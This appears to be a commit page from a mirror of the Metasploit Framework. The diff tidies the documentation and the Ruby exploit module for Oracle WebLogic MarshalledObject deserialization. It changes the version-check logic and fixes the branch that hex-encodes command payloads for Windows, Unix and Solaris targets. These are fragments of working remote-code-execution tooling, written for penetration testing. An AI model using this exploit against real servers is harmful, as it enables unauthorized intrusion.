infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Some improvements in code and documentation.

master
Andres Rodriguez 2018-12-15 20:42:17 -08:00
parent 29c70b8585
commit 873d048b89
2 changed files with 20 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
View File

@ -7,7 +7,7 @@
2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
3. `set rhosts <rhost>`
4. `set rport <srvport>`
6. `exploit`
5. `exploit`
## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
```

25
modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
View File

@ -84,11 +84,17 @@ class MetasploitModule < Msf::Exploit::Remote
disconnect
return CheckCode::Unknown unless res
/WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res
if version
version = Gem::Version.new(version)
print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
unless res.include?('Oracle WebLogic Server Administration Console')
return CheckCode::Safe
end
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
unless version
return CheckCode::Safe
end
version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
@ -97,13 +103,8 @@ class MetasploitModule < Msf::Exploit::Remote
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
end
if res.include?('Oracle WebLogic Server Administration Console')
return CheckCode::Detected
end
CheckCode::Unknown
return CheckCode::Safe
end
def t3_handshake
@ -179,11 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Unix'
elsif target.name == 'Unix'
nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Solaris'
elsif target.name == 'Solaris'
sol_cmd = payload.encoded
mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
end